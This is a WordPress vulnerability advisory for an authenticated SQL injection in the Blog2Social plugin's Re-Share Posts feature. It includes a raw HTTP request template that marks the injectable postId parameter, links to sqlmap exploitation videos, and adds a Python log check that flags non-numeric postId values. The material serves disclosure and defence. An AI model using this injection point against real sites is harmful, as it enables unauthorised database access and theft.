Blog2Social: Social Media Auto Post & Scheduler < 6.3.1 - Authenticated SQL Injection



Description
A SQL injection vulnerability exists in the Blog2Social plugin 6.3.0 for WordPress via the Re-Share Posts feature.
Proof of Concept
Please refer to the video below for the steps to reproduce and a demonstration of automated exploitation with sqlmap.

- Mega.nz: https://mega.nz/file/mt1gFYTK#e3XkA-zY0cCApTYlLZktRZ4Q4vchVhbPsNqQC6CKORo
- Drive: https://drive.google.com/file/d/1-KP_j7Ke4LbdvNi2sTIVpkiu3NcFENPN/view?usp=sharing


Payload:
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/admin.php?page=blog2social-repost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 70
Origin: http://example.com
DNT: 1
Connection: close
Cookie: wordpress_28367124e365cebea6bbf69dfaa9f31b=author1%7C1590633495%7C5Yy7rTkEQl35520rsnZ7xxDTqB742szKwX4RbO5Sh3b%7Ccb6e4516c091f556a9aa62007079d0186b96e19aeacb9a3e16c32b9d472adc23; PHPSESSID=sie1r62oh0f61k0fhg8fqqbf5p; wordpress_test_cookie=WP+Cookie+check; pmpro_visit=1; wordpress_logged_in_28367124e365cebea6bbf69dfaa9f31b=author1%7C1590633495%7C5Yy7rTkEQl35520rsnZ7xxDTqB742szKwX4RbO5Sh3b%7C29ad269c08cf55f201b09941e94d00a8d6e6d41613d434b7ff73bf8fcc6e303f; wp-settings-2=editor%3Dhtml; wp-settings-time-2=1590460695

action=b2s_delete_re_post_sched&postId=INJECT_HERE&b2s_security_nonce=1ee6f55c64
```
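
A defender-side check for the request above, added here as an example and not taken from the advisory or the plugin: it parses a raw `admin-ajax.php` POST and flags any `b2s_delete_re_post_sched` call whose `postId` is not a single plain integer, which suits log review or a virtual-patch rule on sites still running an affected version. The function name `check_request`, the trimmed sample request and the rule that a valid post ID is 1 to 20 ASCII digits are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

TARGET_ACTION = "b2s_delete_re_post_sched"  # AJAX action named in the advisory

# Constructed sample request (trimmed headers); {} is filled with a postId value.
SAMPLE = (
    "POST /wp-admin/admin-ajax.php HTTP/1.1\n"
    "Host: example.com\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n"
    "\n"
    "action=b2s_delete_re_post_sched&postId={}&b2s_security_nonce=1ee6f55c64"
)


def check_request(raw: str) -> str:
    """Classify one raw HTTP request as 'ignore', 'ok' or 'suspicious'."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2 or parts[0] != "POST":
        return "ignore"
    url = urlsplit(parts[1])
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return "ignore"
    params = parse_qs(body.strip(), keep_blank_values=True)
    # WordPress reads the action from the query string or the body.
    actions = params.get("action", []) + parse_qs(url.query).get("action", [])
    if TARGET_ACTION not in actions:
        return "ignore"
    # Array-style keys (postId[]=...) and repeated or missing values are not
    # a single ID, so they are flagged as well.
    values = params.get("postId", [])
    if len(values) != 1 or any(k.startswith("postId[") for k in params):
        return "suspicious"
    value = values[0]  # parse_qs has already percent-decoded it
    # Assumption: a legitimate post ID is 1 to 20 ASCII digits and nothing else.
    is_id = value.isascii() and value.isdigit() and len(value) <= 20
    return "ok" if is_id else "suspicious"


if __name__ == "__main__":
    for candidate in ("42", "INJECT_HERE", "42%20abc", ""):
        print(repr(candidate), "->", check_request(SAMPLE.format(candidate)))
```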

Affects Plugin

Classification

- Type: SQLI
- OWASP Top 10: A1: Injection
- CWE: CWE-89

Miscellaneous

- Original Researcher: Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
- Submitter: Nguyen Anh Tien
- Submitter Website: https://research.sun-asterisk.com/
- Submitter Twitter: https://twitter.com/vigov5
- Views: 856
- Verified: No
- WPVDB ID: 10260

Timeline

- Publicly Published: 2020-05-29 (about 1 month ago)
- Added: 2020-06-09 (29 days ago)
- Last Updated: 2020-06-09 (29 days ago)
